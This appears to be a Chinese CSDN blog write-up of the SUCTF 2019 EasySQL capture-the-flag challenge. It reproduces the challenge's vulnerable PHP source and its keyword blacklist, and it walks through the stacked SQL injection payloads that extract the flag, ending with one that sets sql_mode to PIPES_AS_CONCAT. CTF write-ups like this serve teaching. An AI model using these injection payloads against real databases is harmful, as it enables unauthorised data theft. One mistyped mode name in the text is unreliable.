[SUCTF 2019]EasySQL

最新推荐文章于 2024-03-28 22:54:01 发布
最新推荐文章于 2024-03-28 22:54:01 发布
阅读量625 收藏
点赞数
分类专栏: 做题杂记~ 文章标签: sql
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/114310328
版权

这题一开始做感觉是数字型注入,然后发现可以堆叠注入,但过滤了很多关键字

1;show databases; 爆出数据库
1;show tables;	  爆出表名
1;show columns from Flag	from被过滤用不了,尝试其他方式但还是会被过滤下来

看师傅们的做法:
当时的比赛环境有源码泄露,得到了源码

<?php
    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
    ?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

<?php

    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile
        			|readfile|where|from|union|update|delete|if|sleep|extractvalue|
    			    updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }
    
    ?>

过滤了很多,但没有过滤SET,且执行语句是

 $sql ="select ".$post['query']."||flag from Flag"

||在MYSQL中同样是逻辑或,flag就输出不了

set_mode=PIPPES_AS_CONCAT

将 || 视为字符串的连接操作符而非 或 运算符,这和Oracle数据库是一样的,也和字符串的拼接函数 CONCAT() 相类似。

如下图,可以看到22被当作字符连接到每一个查询结果上了
在这里插入图片描述
因此我们只要把||当作字符操作符而不是执行或运算即可。

99;set sql_mode=PIPES_AS_CONCAT;select 0
在执行语句中是:
select 99;set sql_mode=PIPES_AS_CONCAT;select 0 ||flag from Flag
这样就输出了flag
在这里插入图片描述

D.MIND
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
_PE_Format.pdf
03-26
_PE_Form_PE_Format.pdf_PE_Format.pdf_PE_Format.pdfat.pdf_PE_Format.pdf_PE_Format.pdf
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 1734
EasySQL
[suctf 2019]EasySQL(WP)
最新发布
wikey 的博客
03-28 341
直接查目录发现失败,推测可能更改过系统设置,我们知道flag在目录里但是不能直接打开需要更改设置后访问,这里需要扩展一下PIPES_AS_CONCAT 函数的含义,它的作用就是将两个任务重合在一起执行。当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数。sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数。如果command1执行失败,则执行command2。
[SUCTF 2019]EasySQL 1
tomatoff的博客
04-14 3438
1、进入页面,又是一道注入的题; 2、分别尝试了下输入不同的内容: (1)输入数字1 (2)输入字母a或者带引号的组合1’ (3)输入双引号的组合1" (4)输入a’ or ‘1’=‘1 判断代码对一部分字符进行了过滤; 3、 ...
[SUCTF 2019]EasySQL1
underline0的博客
12-23 882
1.老规矩,先输入1 2.输入1 or 1,页面提示nonono,说明or已被列入黑名单,通过我们尝试,and,union等等都被列入黑名单。 3.我们来判断参数是否被引号,双引号,括号包裹。 输入1' → 页面回显不正常 输入1'#企图注释掉后面的引号 → 依旧不正常 这说明什么,说明了我们#号后面注释掉了一些东西,使sql语句出了问题,因此就不能够使用注释了(同时我们便可以大胆猜测,这边应该没有包裹,因为既然后面还有重要的语句,源码中的sql语句就不会是简...
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1155
又是一道考察sql注入的题。
BUUCTF - [SUCTF 2019]EasySQL1
白帽子续命指南
04-26 7189
猜测后端执行语句 测试环境:BUUCTF - [SUCTF 2019]EasySQL1 通过测试发现,输入数字的时候,页面回显 输入字母页面就没有回显 而尝试执行注入语句的时候,会显示一个nonono 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。而且注入点就是这个POST参数框框,就是那个inject参数。 至少我们可以把精力全部放在这个参数上。...
buuctf-[SUCTF 2019]EasySQL 1(小宇特详解)
小宇的web博客
01-15 4938
buuctf-[SUCTF 2019]EasySQL 1(小宇特详解) 解法1 这里先用的是万能密码,发现不能使用,然后使用堆叠注入发现能够进行 堆叠注入查询数据库 1; show databases; 查询表名 1; show tables; 这里尝试直接访问Flag 1;show columns from Flag;# 发现不行 这里是最迷的一个地方,这里大佬能够猜出查询语句 select $_GET['query'] || flag from flag 这里的||在mysql中表示或,如果
[suctf 2019]EasySQL
qq_61988806的博客
04-25 986
这里先对输入内容进行尝试我们发现输入字符串页面不会回显猜测当输入为字符串不会执行我们测试输入数字发现为1及1以上的时候回显输入0无回显我们大概知道查询语句带上||运算符||运算符和or作用一样及||两边有一边为true则语句顺利执行按照我们的输入知道||右边为0也就是flase那我们不知道||右边的语句先构造*,1 代表查询所以内容 这里没有from 所以我们也就是试一试这就之间出来了,所以我们知道||右边是flag from flag。
BUUCTF——[SUCTF2019]EasySQL
weixin_62248541的博客
11-28 331
BUUCTF——[SUCTF2019]EasySQL
[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)
笑花大王
02-09 871
简介 原题复现: 1 <?php 2 session_start(); 3 4 include_once "config.php"; 5 6 $post = array(); 7 $get = array(); 8 global $MysqlLink; 9 10 //GetPara(); 11 $...
buuctf [SUCTF 2019]EasySQL
SopRomeo的博客
01-30 2200
直接放进burpsuit去,发现不是字符型注入,双引号也不报错,这道题过滤了 order by和 union,试试报错注入 不可行。。。。。,换成updataxml也不行 放弃考虑盲注,试试堆叠注入 欧克,完美注入,接着查表 查字段 emmmmmm,把查字段的语句过滤了大写也没用,白高兴一场,试了下转acii码还是不行, 想投机取巧还是不行。。。。(因为表名是Flag,那么字段名肯定是fla...
CTF [SUCTF 2019]EasySQL writeup 堆叠注入 | || *的使用
baynk的博客
04-01 2468
专挑注入的题先做。。。 0x01 干干干 给flag, 然后又试了',",-1等查找注入点的参数,发现存在整形注入,出现Nonono.都是被检测出来有过滤,于是去fuzz了下。 这些都是被过滤的,于是发现有个|和||没有被过滤,可以搞盲注,但是or被过滤了,information也连带着用不了,这玩意用不了常规的注入好像也没用,报错信息也关了,报错注入也用不了。于是又看前端的输出感觉像堆叠注...
suctf 2019 easysql怎么解
03-28
题目链接:http://easysql.suctf2019.cn:8888/ 题解 进入网站后,可以看到一个登录页面,尝试使用常见的一些弱口令进行登录,发现均不可行。故考虑其他方式进入系统。 点击右上角的注册按钮,可以看到注册页面。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值